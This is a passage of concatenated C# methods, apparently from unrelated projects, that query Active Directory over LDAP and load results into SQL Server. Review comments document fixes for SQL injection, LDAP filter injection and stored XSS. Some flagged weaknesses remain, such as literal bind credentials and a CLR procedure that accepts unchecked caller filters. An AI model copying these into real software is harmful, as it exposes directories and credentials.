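                mySearcher.SizeLimit = 0;

                // Read data in pages of 250 objects. Keep this below any page limit
                // configured in the AD domain.
                mySearcher.PageSize = 250;

                // Only load the attributes that are (or are planned to be) used.
                mySearcher.PropertiesToLoad.Add("name");
                mySearcher.PropertiesToLoad.Add("dNSHostName");
                mySearcher.PropertiesToLoad.Add("lastLogonTimeStamp");

                // The result collection owns a native search handle; the original enumerated
                // it inline and never disposed it.
                using (SearchResultCollection found = mySearcher.FindAll())
                {
                    foreach (SearchResult resEnt in found)
                    {
                        // TODO figure out how to compare lastLogonTimeStamp.

                        // Properties can contain multiple values; only the first is used.
                        if (resEnt.Properties["dNSHostName"].Count > 0)
                        {
                            var computerName = (string)resEnt.Properties["dNSHostName"][0];
                            domainComputers.Add(computerName);
                        }
                    }
                }
            }

            return domainComputers;
        }
        catch (Exception e)
        {
            Config.Mq.Trace(e.ToString());
            throw;
        }
    }

    return null;
}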
/// <summary>
/// Populates <c>children</c> with every domain whose cross-reference object under
/// CN=Partitions names this domain (<c>dName</c>) as its trust parent.
/// </summary>
/// <remarks>
/// Every bind in this method uses the credentials held in <c>dc</c>. Returns without adding
/// anything when the configuration naming context is missing or no crossRef objects are found.
/// </remarks>
private void FindChildrenDomains()
{
    DirectoryEntry rootDse = new DirectoryEntry(string.Format("LDAP://{0}/RootDSE", dName), dc.UserName, dc.Password);

    string configNc = rootDse.DirContext.ConfigurationNamingContext;
    if (string.IsNullOrEmpty(configNc))
    {
        return;
    }

    // Cross-reference objects sit directly below CN=Partitions in the configuration context.
    string partitionsPath = string.Format("LDAP://{0}/CN=Partitions,{1}", SDSUtils.DNToDomainName(configNc), configNc);
    DirectoryEntry partitions = new DirectoryEntry(partitionsPath, dc.UserName, dc.Password);

    DirectorySearcher crossRefSearch = new DirectorySearcher(partitions);
    crossRefSearch.Filter = "(objectClass=crossRef)";
    crossRefSearch.SearchScope = SearchScope.OneLevel;

    SearchResultCollection crossRefs = crossRefSearch.FindAll();
    if (crossRefs == null || crossRefs.Count <= 0)
    {
        return;
    }

    foreach (SearchResult crossRef in crossRefs)
    {
        // The cracked parts are not used below; the call is kept because the original makes it.
        string protocol, server, cnPart, dcPart;
        SDSUtils.CrackPath(crossRef.Path, out protocol, out server, out cnPart, out dcPart);

        DirectoryEntry partEntry = new DirectoryEntry(crossRef.Path, dc.UserName, dc.Password);
        string parentDomainDN = partEntry.Properties["trustParent"].Value as string;

        if (string.IsNullOrEmpty(parentDomainDN))
        {
            continue;
        }

        bool isChildOfThisDomain = dName.Equals(SDSUtils.DNToDomainName(parentDomainDN), StringComparison.InvariantCultureIgnoreCase);
        if (!isChildOfThisDomain)
        {
            continue;
        }

        children.Add(new Domain(SDSUtils.DNToDomainName(partEntry.Properties["nCName"].Value as string)));
    }
}
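/// <summary>
/// Rebuilds the gk_adlist table: truncates it, then inserts one row per directory user
/// returned by the search (person users whose account is not disabled) that has both a
/// display name and a mail address.
/// </summary>
/// <remarks>
/// Directory attribute values are data an account owner or delegated admin can often edit,
/// so they are sent to SQL Server as parameters. The original concatenated them into the
/// INSERT text and passed telephonenumber through no filtering at all.
/// NOTE(review): the bind credentials are literals in source (masked on this page); load
/// them from protected configuration instead.
/// NOTE(review): the table is truncated before the rows are read back, and nothing runs in
/// a transaction, so a failure part-way leaves the table partially filled.
/// </remarks>
public void ReinstailizeAD_Table()
{
    const string insertSql =
        "insert into gk_adlist (quid,displayname,emailadd,company,department,phonenumber,samaccountname,title) " +
        "values (@quid,@displayname,@emailadd,@company,@department,@phonenumber,@samaccountname,@title)";

    using (DirectoryEntry entry = new DirectoryEntry(@"LDAP://ad.asdfasdf.com")) // :636
    using (DirectorySearcher mySearcher = new DirectorySearcher(entry))
    {
        mySearcher.PageSize = 6000;
        entry.Username = "******";
        entry.Password = "******";

        // Person users only; the bitwise-AND rule on userAccountControl bit 2 excludes disabled accounts.
        mySearcher.Filter = "(&(objectClass=user)(objectCategory=person)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))";
        mySearcher.PropertiesToLoad.Add("telephonenumber");
        mySearcher.PropertiesToLoad.Add("department");
        mySearcher.PropertiesToLoad.Add("displayname");
        mySearcher.PropertiesToLoad.Add("objectguid");
        mySearcher.PropertiesToLoad.Add("mail");
        mySearcher.PropertiesToLoad.Add("company");
        mySearcher.PropertiesToLoad.Add("mailnickname");
        mySearcher.PropertiesToLoad.Add("samaccountname");
        mySearcher.PropertiesToLoad.Add("title");

        using (SearchResultCollection results = mySearcher.FindAll())
        {
            // Connections are closed rather than disposed: the original already closed the
            // connection after each insert, so Close() is known to be compatible with
            // whatever Appconnection() hands out. The truncate connection used to stay open.
            SqlConnection truncateConnection = Appconnection();
            try
            {
                using (SqlCommand truncate = new SqlCommand(@"truncate table gk_adlist", truncateConnection))
                {
                    truncate.ExecuteNonQuery();
                }
            }
            finally
            {
                truncateConnection.Close();
            }

            foreach (SearchResult resEnt in results)
            {
                // All values are per-iteration locals. The original reused method-level
                // variables and never reset samaccountname or title, so a user without
                // those attributes inherited the previous user's values.
                string queryGuid = "";
                byte[] guidBytes = resEnt.Properties["objectguid"].Count > 0
                    ? resEnt.Properties["objectguid"][0] as byte[]
                    : null;
                if (guidBytes != null)
                {
                    // Same lowercase two-digit hex per byte as the original loop produced.
                    queryGuid = BitConverter.ToString(guidBytes).Replace("-", "").ToLowerInvariant();
                }

                // NOTE(review): replacebadcharacters is kept so stored values stay as before;
                // with parameters it is no longer needed for SQL safety - confirm what it does
                // before removing it. It was applied twice to company in the original.
                string telephonenumber = ReadFirstAdValue(resEnt, "telephonenumber");
                string department = replacebadcharacters(ReadFirstAdValue(resEnt, "department"));
                string displayname = replacebadcharacters(ReadFirstAdValue(resEnt, "displayname"));
                string mail = replacebadcharacters(ReadFirstAdValue(resEnt, "mail"));
                string samaccountname = replacebadcharacters(ReadFirstAdValue(resEnt, "samaccountname"));
                string title = replacebadcharacters(ReadFirstAdValue(resEnt, "title"));
                string company = replacebadcharacters(replacebadcharacters(ReadFirstAdValue(resEnt, "company")));

                // Rows without a display name or mail address are not stored.
                if (displayname.Trim().Length == 0 || mail.Trim().Length == 0)
                {
                    continue;
                }

                SqlConnection insertConnection = null;
                try
                {
                    insertConnection = Appconnection();
                    using (SqlCommand dbcom = new SqlCommand(insertSql, insertConnection))
                    {
                        dbcom.Parameters.AddWithValue("@quid", queryGuid);
                        dbcom.Parameters.AddWithValue("@displayname", displayname);
                        dbcom.Parameters.AddWithValue("@emailadd", mail);
                        dbcom.Parameters.AddWithValue("@company", company);
                        dbcom.Parameters.AddWithValue("@department", department);
                        dbcom.Parameters.AddWithValue("@phonenumber", telephonenumber);
                        dbcom.Parameters.AddWithValue("@samaccountname", samaccountname);
                        dbcom.Parameters.AddWithValue("@title", title);
                        dbcom.ExecuteNonQuery();
                    }
                }
                catch (Exception ex)
                {
                    // Still best effort (one bad row must not stop the import), but the
                    // failure is now traced instead of vanishing.
                    System.Diagnostics.Trace.TraceWarning("gk_adlist insert failed for object " + queryGuid + ": " + ex.Message);
                }
                finally
                {
                    if (insertConnection != null)
                    {
                        insertConnection.Close();
                    }
                }
            }
        }
    }
}

/// <summary>
/// Returns the first value of a search-result attribute as a trimmed string, or an empty
/// string when the attribute is absent.
/// </summary>
private static string ReadFirstAdValue(SearchResult result, string propertyName)
{
    ResultPropertyValueCollection values = result.Properties[propertyName];
    if (values.Count == 0 || values[0] == null)
    {
        return "";
    }

    return values[0].ToString().Trim();
}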
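/// <summary>
/// Searches the subtree below <paramref name="deTop"/> for the object classes selected by
/// <paramref name="filter"/> (narrowed by the <c>groupScope</c> field where set) and returns
/// the matches keyed by distinguished name.
/// </summary>
/// <param name="deTop">Search root.</param>
/// <param name="filter">Which kinds of members to return.</param>
/// <param name="maxResultSetSize">Stop once this many entries have been collected.</param>
/// <param name="bw">Worker that receives any exception through ReportProgress.</param>
/// <returns>
/// Map from distinguishedName to directory entry. On an error the entries gathered so far
/// are returned and the exception is reported to <paramref name="bw"/>.
/// </returns>
public Dictionary<string, DirectoryEntry> GetAllMembers(DirectoryEntry deTop, ProviderMemberFilter filter, int maxResultSetSize, BackgroundWorker bw)
{
    Dictionary<string, DirectoryEntry> adUserGroupMap = new Dictionary<string, DirectoryEntry>();
    int count = 0;
    string filterString = "";
    string objecttype = "";

    // Every filter below is assembled from constants; groupScope only selects between them
    // and is never concatenated into the filter text.
    if (filter == ProviderMemberFilter.AllUserGroupMembersOnly)
    {
        if (groupScope == null || groupScope == string.Empty)
        {
            filterString = "(|(objectClass=user)(objectClass=group))";
        }
        else
        {
            filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" +
                           "(&(objectClass=group)(grouptype=-2147483646))(&(objectClass=group)(grouptype=2))" +
                           "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4))(objectClass=user))";
        }
        objecttype = "usergroup";
    }
    else if (filter == ProviderMemberFilter.GroupMembersOnly)
    {
        if (groupScope == null || groupScope == string.Empty)
        {
            filterString = "(objectClass=group)";
        }
        else if (groupScope == "-2147483644" || groupScope == "4")
        {
            filterString = "(|(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4)))";
        }
        else if (groupScope == "-2147483640" || groupScope == "8")
        {
            filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" +
                           "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4)))";
        }
        else if (groupScope == "-2147483646" || groupScope == "2")
        {
            filterString = "(objectClass=group)";
        }
        objecttype = "group";
    }
    else if (filter == ProviderMemberFilter.LocalGroupsOnly)
    {
        filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" +
                       "(&(objectClass=group)(grouptype=-2147483646))(&(objectClass=group)(grouptype=2))" +
                       "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4)))";
        objecttype = "group";
    }
    else if (filter == ProviderMemberFilter.UserMembersOnly)
    {
        filterString = "(objectClass=user)";
        objecttype = "user";
    }
    else if (filter == ProviderMemberFilter.AllMembers)
    {
        if (groupScope == null || groupScope == string.Empty)
        {
            filterString = "(|(objectClass=user)(objectClass=group)(objectClass=computer))";
        }
        else
        {
            if (groupScope == "-2147483644" || groupScope == "4")
            {
                filterString = "(|(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4))(objectClass=user))";
            }
            else if (groupScope == "-2147483640" || groupScope == "8")
            {
                filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" +
                               "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4))(objectClass=user))";
            }
            else if (groupScope == "-2147483646" || groupScope == "2")
            {
                filterString = "(|(objectClass=user)(objectClass=group))";
            }
            else if (groupScope == "-2147483643")
            {
                filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" +
                               "(&(objectClass=group)(grouptype=-2147483646))(&(objectClass=group)(grouptype=2))(objectClass=user))";
            }
        }
        objecttype = "domainusergroup";
    }
    else if (filter == ProviderMemberFilter.AllUserComputerMembersOnly)
    {
        filterString = "(|(objectClass=user)(objectClass=computer))";
    }

    DirectorySearcher dsT = new DirectorySearcher(deTop, filterString);
    dsT.SearchScope = SearchScope.Subtree;
    dsT.PageSize = SEARCHER_PAGE_SIZE;

    SearchResultCollection src = null;
    try
    {
        src = dsT.FindAll();

        foreach (SearchResult sr in src)
        {
            if (count == maxResultSetSize)
            {
                return adUserGroupMap;
            }

            DirectoryEntry o = new DirectoryEntry(sr.Path);
            string schemaClass = o.SchemaClassName;

            // Re-check the schema class of the bound entry against what this filter asked for.
            bool wanted;
            if (filter == ProviderMemberFilter.AllMembers)
            {
                wanted = schemaClass.Equals("user") || schemaClass.Equals("group") || schemaClass.Equals("computer");
            }
            else if (filter == ProviderMemberFilter.AllUserComputerMembersOnly)
            {
                wanted = schemaClass.Equals("user") || schemaClass.Equals("computer");
            }
            else if (filter == ProviderMemberFilter.AllUserGroupMembersOnly)
            {
                wanted = schemaClass.Equals("user") || schemaClass.Equals("group");
            }
            else
            {
                wanted = schemaClass.Equals(objecttype);
            }

            if (wanted)
            {
                adUserGroupMap.Add(o.Properties["distinguishedName"].Value as string, o);
                count++;
            }
        }
    }
    catch (Exception aex)
    {
        bw.ReportProgress(percentDone, (Object)aex);
    }
    finally
    {
        // src is still null when FindAll() itself throws. The unguarded Dispose() in the
        // original then raised a NullReferenceException from this finally block, replacing
        // the partial result the catch above is meant to preserve.
        if (src != null)
        {
            src.Dispose();
        }
    }

    return adUserGroupMap;
}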
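/// <summary>
/// Reads every organizational unit below the configured AD URL and returns it with its
/// GUID, display name, DN and parent GUID, leaving out OUs whose DN ends with an entry of
/// <c>ousToIgnore</c>.
/// </summary>
/// <returns>One <c>ADOrgUnit</c> per OU that was not ignored.</returns>
public List<ADOrgUnit> ReadOrgUnits()
{
    List<ADOrgUnit> orgUnits = new List<ADOrgUnit>();
    string nameField = Properties.Settings.Default.OrgUnitNameField;

    using (DirectoryEntry startingPoint = new DirectoryEntry(Properties.Settings.Default.ADUrl))
    using (DirectorySearcher searcher = new DirectorySearcher(startingPoint))
    {
        searcher.PageSize = 500;
        searcher.Filter = "(objectCategory=organizationalUnit)";
        searcher.PropertiesToLoad.Add("objectGUID");
        searcher.PropertiesToLoad.Add("name");
        searcher.PropertiesToLoad.Add("ou");
        searcher.PropertiesToLoad.Add(nameField);
        searcher.PropertiesToLoad.Add("distinguishedname");

        using (var resultSet = searcher.FindAll())
        {
            foreach (SearchResult res in resultSet)
            {
                Guid uuid = new Guid((byte[])res.Properties["objectGUID"][0]);
                string dn = (string)res.Properties["distinguishedname"][0];

                // Name preference: configured field, then "name", then "ou".
                string name;
                if (res.Properties.Contains(nameField))
                {
                    name = (string)res.Properties[nameField][0];
                }
                else if (res.Properties.Contains("name"))
                {
                    name = (string)res.Properties["name"][0];
                }
                else
                {
                    name = (string)res.Properties["ou"][0];
                }

                // DNs are compared ordinally and case-insensitively. The original lower-cased
                // both sides with the current culture, which can miss a match under cultures
                // with special casing rules.
                bool skip = false;
                foreach (string ouToIgnore in ousToIgnore)
                {
                    if (ouToIgnore.Trim().Length == 0)
                    {
                        continue;
                    }

                    if (dn.EndsWith(ouToIgnore, StringComparison.OrdinalIgnoreCase))
                    {
                        skip = true;
                        break;
                    }
                }

                if (skip)
                {
                    continue;
                }

                ADOrgUnit ou = new ADOrgUnit();
                ou.Uuid = uuid.ToString().ToLower();
                ou.Name = name;
                ou.Dn = dn;

                // The entry and its parent are opened only for OUs that are kept, and both
                // are disposed. The original opened them for every result, including ignored
                // ones, and never released them.
                using (DirectoryEntry self = res.GetDirectoryEntry())
                using (DirectoryEntry parent = self?.Parent)
                {
                    if (parent != null)
                    {
                        ou.ParentUUID = parent.Guid.ToString().ToLower();
                    }
                }

                orgUnits.Add(ou);
            }
        }
    }

    return orgUnits;
}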
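/// <summary>
/// Looks up the user whose cn equals <paramref name="userName"/> and returns selected
/// attributes ("principalname", and "mobileno" when present) in a Hashtable.
/// </summary>
/// <param name="userName">
/// Common name to match. It is escaped before it is placed in the filter, so characters such
/// as '*' and parentheses match literally and cannot widen or rewrite the search.
/// </param>
/// <param name="path">
/// Passed to the single-string DirectorySearcher constructor.
/// NOTE(review): that constructor takes a filter, not a search root, and the filter is
/// overwritten below, so this value has no effect - confirm whether a search root was intended.
/// </param>
/// <returns>The collected attributes; empty when no user matched.</returns>
/// <exception cref="Exception">Any failure during the search, with the cause as InnerException.</exception>
public Hashtable GetUserInfo(string userName, string path)
{
    using (DirectorySearcher search = new DirectorySearcher(path))
    {
        SSAErrorLog logObj = new SSAErrorLog();
        string logFile = ConfigurationManager.AppSettings["logfilepath"].ToString();

        logObj.ErrorLog(logFile, "get user info 1");

        // The original concatenated userName into the filter unescaped, which let a caller
        // inject filter syntax (wildcards, extra clauses) into the directory query.
        search.Filter = "(&(objectClass=user)(cn=" + EscapeLdapFilterValue(userName) + "))";

        // NOTE(review): userName is written to the log as received; if the log is parsed
        // line by line, strip CR/LF first.
        logObj.ErrorLog(logFile, "get user info 2" + userName);

        SearchResultCollection sResults = null;
        Hashtable getData = null;
        try
        {
            getData = new Hashtable();
            sResults = search.FindAll();
            logObj.ErrorLog(logFile, "get user info 2" + sResults.Count);

            foreach (SearchResult searchResult in sResults)
            {
                logObj.ErrorLog(logFile, "searching propss...1 ");
                ResultPropertyValueCollection principalname = searchResult.Properties["name"];

                logObj.ErrorLog(logFile, "searching propss...2 ");
                ResultPropertyValueCollection mobileno = searchResult.Properties["mobile"];
                logObj.ErrorLog(logFile, "searching propss...3 " + "mobileno obj " + mobileno);

                // Throws when the entry has no name value, or when a second result adds the
                // same key; both end up in the catch below, as before.
                getData.Add("principalname", principalname[0].ToString());

                if (mobileno != null)
                {
                    if (mobileno.Count > 0)
                    {
                        getData.Add("mobileno", mobileno[0].ToString());
                    }
                }
                else
                {
                    logObj.ErrorLog(logFile, "no mobileno () ");
                }
            }
        }
        catch (Exception ex)
        {
            logObj.ErrorLog(logFile, "get user info excep" + ex.Message);
            // Same exception type and message as before; the cause is now attached so the
            // original stack trace is not lost.
            throw new Exception("Error obtaining group names. " + ex.Message, ex);
        }
        finally
        {
            // Release the native search handle on every path.
            if (sResults != null)
            {
                sResults.Dispose();
            }
        }

        return getData;
    }
}

/// <summary>
/// Escapes a value for use inside an LDAP search filter (RFC 4515): backslash, asterisk,
/// parentheses and NUL are replaced by their backslash-hex forms. Null yields an empty string.
/// </summary>
private static string EscapeLdapFilterValue(string value)
{
    if (string.IsNullOrEmpty(value))
    {
        return string.Empty;
    }

    System.Text.StringBuilder escaped = new System.Text.StringBuilder(value.Length + 8);
    foreach (char c in value)
    {
        switch (c)
        {
            case '\\': escaped.Append(@"\5c"); break;
            case '*': escaped.Append(@"\2a"); break;
            case '(': escaped.Append(@"\28"); break;
            case ')': escaped.Append(@"\29"); break;
            case '\0': escaped.Append(@"\00"); break;
            default: escaped.Append(c); break;
        }
    }

    return escaped.ToString();
}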
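/// <summary>
/// Binds to the server configured for <paramref name="sDomainName"/> and returns all user
/// objects that have both a givenname and an sn, loading userAccountControl and SAMAccountName.
/// </summary>
/// <param name="sDomainName">
/// Domain label. It is both the AppSettings key that yields the server name and the first DC
/// component of the bind path. A name with no AppSettings entry fails on the ToString() call
/// before any bind is attempted, so only configured names reach the directory.
/// </param>
/// <returns>
/// The search results, or <c>null</c> when the search failed with a message containing
/// "The server is not operational.". The caller owns the collection and must dispose it.
/// </returns>
private static SearchResultCollection RetrieveAllNetworkUsersFromLDAP(string sDomainName)
{
    string sServerName = System.Configuration.ConfigurationManager.AppSettings[sDomainName].ToString();
    string sLDAPPath = "LDAP://" + sServerName + "/DC=" + sDomainName + ",DC=root01,DC=org";

    // using blocks release the entry and the searcher on every path. In the original the
    // Dispose calls sat after the try/catch, so the rethrow path skipped them.
    using (DirectoryEntry objRootDE = new DirectoryEntry(sLDAPPath, sUID, sPwd, AuthenticationTypes.Secure))
    using (DirectorySearcher objDS = new DirectorySearcher(objRootDE))
    {
        objDS.Filter = "(|(&(objectClass=User)(givenname=*)(sn=*)))";
        objDS.ReferralChasing = ReferralChasingOption.None;
        objDS.PropertiesToLoad.Add("userAccountControl");
        objDS.PropertiesToLoad.Add("SAMAccountName");

        try
        {
            return objDS.FindAll();
        }
        catch (Exception excpt)
        {
            // An unreachable server is treated as "no data"; everything else propagates.
            // NOTE(review): matching on the message text presumably only works where the
            // system returns this exact English message - confirm, or test the error code.
            if (excpt.Message.IndexOf("The server is not operational.") < 0)
            {
                throw;
            }

            return null;
        }
    }
}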
/// <summary>
/// Binds to an AD LDS container, searches its subtree for group objects and prints each
/// group with its members. Each stage reports its own error and ends the program on failure.
/// </summary>
static void Main()
{
    // Binding string for the container to enumerate.
    string bindPath = "LDAP://localhost:389/OU=TestOU,O=Fabrikam,C=US";
    Console.WriteLine("Bind to: {0}", bindPath);
    Console.WriteLine("Enum: Groups and members.");

    // Stage 1: bind. RefreshCache forces the bind so a bad path fails here.
    DirectoryEntry container;
    try
    {
        container = new DirectoryEntry(bindPath);
        container.RefreshCache();
    }
    catch (Exception bindError)
    {
        Console.WriteLine("Error: Bind failed.");
        Console.WriteLine(" {0}", bindError.Message);
        return;
    }

    // Stage 2: search the whole subtree for groups.
    SearchResultCollection groups;
    try
    {
        DirectorySearcher groupSearch = new DirectorySearcher(container);
        groupSearch.Filter = "(&(objectClass=group))";
        groupSearch.SearchScope = SearchScope.Subtree;
        groups = groupSearch.FindAll();
    }
    catch (Exception searchError)
    {
        Console.WriteLine("Error: Search failed.");
        Console.WriteLine(" {0}", searchError.Message);
        return;
    }

    // Stage 3: print every group followed by the values of its member attribute.
    try
    {
        if (groups.Count == 0)
        {
            Console.WriteLine("Results: No groups found.");
        }
        else
        {
            foreach (SearchResult hit in groups)
            {
                DirectoryEntry group = hit.GetDirectoryEntry();
                Console.WriteLine("Group {0}", group.Name);

                foreach (object member in group.Properties["member"])
                {
                    Console.WriteLine(" Member: {0}", member.ToString());
                }
            }
        }
    }
    catch (Exception enumError)
    {
        Console.WriteLine("Error: Enumerate failed.");
        Console.WriteLine(" {0}", enumError.Message);
        return;
    }

    Console.WriteLine("Success: Enumeration complete.");
}
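/// <summary>
/// Click handler: lists person objects from the directory that have a mail address and
/// whose display name matches the name pattern, writing account name, display name, mail,
/// company and UserFlags for each to the response.
/// </summary>
/// <remarks>
/// Directory attribute values are written into HTML, so each one is HTML-encoded first. The
/// original wrote them raw, which let markup stored in an attribute run in the browser of
/// whoever opened this page.
/// </remarks>
protected void btnClick_Click(object sender, EventArgs e)
{
    // Entry, searcher and result collection hold native handles; the original released none.
    using (DirectoryEntry myDirectoryEntry = new DirectoryEntry(String.Format("LDAP://{0}", "Progressive.com")))
    using (DirectorySearcher mySearcher = new DirectorySearcher(myDirectoryEntry))
    {
        mySearcher.Filter = ("(objectCategory=person)");

        using (SearchResultCollection results = mySearcher.FindAll())
        {
            foreach (SearchResult result in results)
            {
                // Entries without a mail or display name are skipped explicitly. The original
                // relied on the indexer throwing and an empty catch swallowing the exception.
                ResultPropertyValueCollection mailValues = result.Properties["Mail"];
                ResultPropertyValueCollection nameValues = result.Properties["DisplayName"];
                if (mailValues.Count == 0 || nameValues.Count == 0)
                {
                    continue;
                }

                if (String.IsNullOrEmpty(mailValues[0].ToString()))
                {
                    continue;
                }

                bool nameMatches = System.Text.RegularExpressions.Regex.IsMatch(
                    nameValues[0].ToString(),
                    " |admin|test|service|system|[$]",
                    System.Text.RegularExpressions.RegexOptions.IgnoreCase);
                if (!nameMatches)
                {
                    continue;
                }

                string SAMAccountName = result.Properties["sAMAccountName"].Count > 0 ? result.Properties["sAMAccountName"][0].ToString() : "";
                string DisplayName = result.Properties["displayName"].Count > 0 ? result.Properties["displayName"][0].ToString() : "";
                string mail = result.Properties["mail"].Count > 0 ? result.Properties["mail"][0].ToString() : "";
                string company = result.Properties["company"].Count > 0 ? result.Properties["company"][0].ToString() : "";
                // NOTE(review): this variable is named department but reads "UserFlags" - confirm which was meant.
                string department = result.Properties["UserFlags"].Count > 0 ? result.Properties["UserFlags"][0].ToString() : "";

                Response.Write(Server.HtmlEncode(SAMAccountName));
                Response.Write(" ");
                Response.Write(Server.HtmlEncode(DisplayName));
                Response.Write(" ");
                Response.Write(Server.HtmlEncode(mail));
                Response.Write(" ");
                Response.Write(Server.HtmlEncode(company));
                Response.Write(" ");
                Response.Write(Server.HtmlEncode(department));
                Response.Write("<br>");
            }
        }
    }
}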
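/// <summary>
/// SQL CLR procedure: searches the directory under <paramref name="ADpath"/> with
/// <paramref name="ADfilter"/>, builds one row per object using the column set that
/// <c>ADcolsTable</c> derives from the filter, and returns the rows to SQL Server. Group
/// membership is returned separately as XML.
/// </summary>
/// <param name="ADpath">ADsPath to bind to; handed to DirectoryEntry unchanged.</param>
/// <param name="ADfilter">LDAP filter; handed to DirectorySearcher unchanged.</param>
/// <param name="MemberList">Receives the XML document holding the group members.</param>
/// <remarks>
/// Filter syntax: https://msdn.microsoft.com/en-us/library/aa746475(v=vs.85).aspx
/// AD attributes: https://msdn.microsoft.com/en-us/library/ms675089(v=vs.85).aspx
/// Both arguments reach the directory exactly as the SQL caller supplied them, and the bind
/// uses no explicit credentials. Anyone allowed to execute this procedure can therefore run
/// any search the hosting identity may run, so restrict EXECUTE permission accordingly.
/// </remarks>
public static void clr_GetADobjects(SqlString ADpath, SqlString ADfilter, out SqlXml MemberList)
{
    MemberList = new SqlXml();
    SearchResultCollection results = null;
    Int32 itemcount = 0;

    try
    {
        XmlDocument doc = new XmlDocument();
        XmlDeclaration xmlDeclaration = doc.CreateXmlDeclaration("1.0", "UTF-8", null);
        XmlElement root = doc.DocumentElement;
        doc.InsertBefore(xmlDeclaration, root);
        XmlElement body = doc.CreateElement(string.Empty, "body", string.Empty);
        doc.AppendChild(body);

        ADcolsTable TblData = new ADcolsTable((string)ADfilter);
        DataTable tbl = TblData.CreateTable();
        DataRow row;

        // Key is the (user) distinguishedname, value is the object GUID.
        Dictionary<string, Guid> UserDStoGUID = new Dictionary<string, Guid>();

        // The root entry and the searcher wrap native ADSI handles; the original never
        // released them, so every call leaked both.
        using (DirectoryEntry entry = new DirectoryEntry((string)ADpath))
        using (DirectorySearcher searcher = new DirectorySearcher(entry))
        {
            searcher.Filter = (string)ADfilter;
            searcher.PageSize = 500;
            results = searcher.FindAll();

            foreach (SearchResult searchResult in results)
            {
                itemcount++;

                // One DirectoryEntry is opened per result; dispose it at the end of the
                // iteration so a large result set does not accumulate open handles.
                using (DirectoryEntry item = searchResult.GetDirectoryEntry())
                {
                    row = tbl.NewRow();

                    UACflags Item_UAC_flags = null;
                    Int64 UserPasswordExpiryTimeComputed = 0;
                    PropertyValueCollection ADGroupType = null;

                    for (int i = 0; i < TblData.collist.Length; i++)
                    {
                        TableColDef coldef = TblData.collist[i];
                        switch (coldef.OPtype)
                        {
                            case "Adprop":
                                if (coldef.ADpropName == "useraccountcontrol" && Item_UAC_flags != null)
                                {
                                    row[i] = Item_UAC_flags.ADobj_flags;
                                    break;
                                }
                                PropertyValueCollection prop = Util.GetADproperty(item, coldef.ADpropName);
                                if (prop != null)
                                    row[i] = prop.Value;
                                break;

                            case "UAC":
                                if (Item_UAC_flags == null)
                                {
                                    // Get UAC flags only once per AD object.
                                    Item_UAC_flags = new UACflags(Util.Get_userAccountControl(item, out UserPasswordExpiryTimeComputed));
                                }
                                row[i] = Item_UAC_flags.GetFlag(coldef.ADpropName);
                                break;

                            case "ObjClass":
                                row[i] = item.SchemaClassName;
                                break;

                            case "ObjGuid":
                                row[i] = item.Guid;
                                break;

                            case "filetime":
                                Int64 time = 0;
                                if (coldef.ADpropName == "msDS-UserPasswordExpiryTimeComputed")
                                    time = UserPasswordExpiryTimeComputed;
                                else
                                    time = Util.GetFileTime(searchResult, coldef.ADpropName);
                                // Zero, negative, -1 and Int64.MaxValue leave the column NULL.
                                if (time > 0 && time != 0x7fffffffffffffff && time != -1)
                                {
                                    row[i] = DateTime.FromFileTime(time); // Convert UTC to local time.
                                }
                                break;

                            case "SID":
                                row[i] = Util.GetSID(item, coldef.ADpropName);
                                break;

                            case "GrpCat":
                                if (ADGroupType == null)
                                    ADGroupType = Util.GetADproperty(item, "grouptype");
                                row[i] = Util.GetGroupCategory(ADGroupType);
                                break;

                            case "GrpScope":
                                if (ADGroupType == null)
                                    ADGroupType = Util.GetADproperty(item, "grouptype");
                                row[i] = Util.GetGroupScope(ADGroupType);
                                break;
                        }
                    }
                    tbl.Rows.Add(row);

                    if (TblData.IsUser)
                    {
                        // Set UserMustChangePasswordAtNextLogon: true when no password-last-set
                        // value exists and the password neither never expires nor is optional.
                        bool IsUsrChgPwd = false;
                        if (row.IsNull("PasswordLastSet")
                            && !row.IsNull("PasswordNeverExpires")
                            && !row.IsNull("PasswordNotRequired")
                            && !(bool)row["PasswordNeverExpires"]
                            && !(bool)row["PasswordNotRequired"])
                        {
                            IsUsrChgPwd = true;
                        }
                        row["UserMustChangePasswordAtNextLogon"] = IsUsrChgPwd;

                        // Remember distinguishedname -> GUID; needed below for ManagerGUID.
                        UserDStoGUID.Add((string)row["distinguishedname"], (Guid)row["ObjectGUID"]);
                    }

                    // Save group members into the Xml document.
                    if (TblData.IsGroup && item.Properties.Contains("member"))
                    {
                        PropertyValueCollection coll = Util.GetADproperty(item, "member");
                        string parent = (string)row["distinguishedname"];
                        Util.SaveGroupMembersToXml(doc, body, parent, coll);
                    }
                }
            }
        }

        // All rows have been added to the dataset.
        // Set ManagerGUID column for user objects.
        if (TblData.IsUser)
        {
            foreach (DataRow rowUsr in tbl.Rows)
            {
                object manager = rowUsr["Manager"]; // distinguishedname of Manager.
                if (manager == DBNull.Value)
                    continue;
                Guid ManagerGUID;
                if (UserDStoGUID.TryGetValue((string)manager, out ManagerGUID))
                    rowUsr["ManagerGUID"] = ManagerGUID;
            }
        }

        // Return dataset to SQL server.
        ReturnDatasetToSqlServer(tbl);

        using (XmlNodeReader xnr = new XmlNodeReader(doc))
        {
            MemberList = new SqlXml(xnr);
        }
    }
    catch (System.Runtime.InteropServices.COMException)
    {
        SqlContext.Pipe.Send("COMException in clr_GetADobjects. ItemCounter = " + itemcount.ToString());
        throw;
    }
    catch (InvalidOperationException)
    {
        SqlContext.Pipe.Send("InvalidOperationException in clr_GetADobjects. ItemCounter = " + itemcount.ToString());
        throw;
    }
    catch (NotSupportedException)
    {
        SqlContext.Pipe.Send("NotSupportedException in clr_GetADobjects. ItemCounter = " + itemcount.ToString());
        throw;
    }
    catch (Exception)
    {
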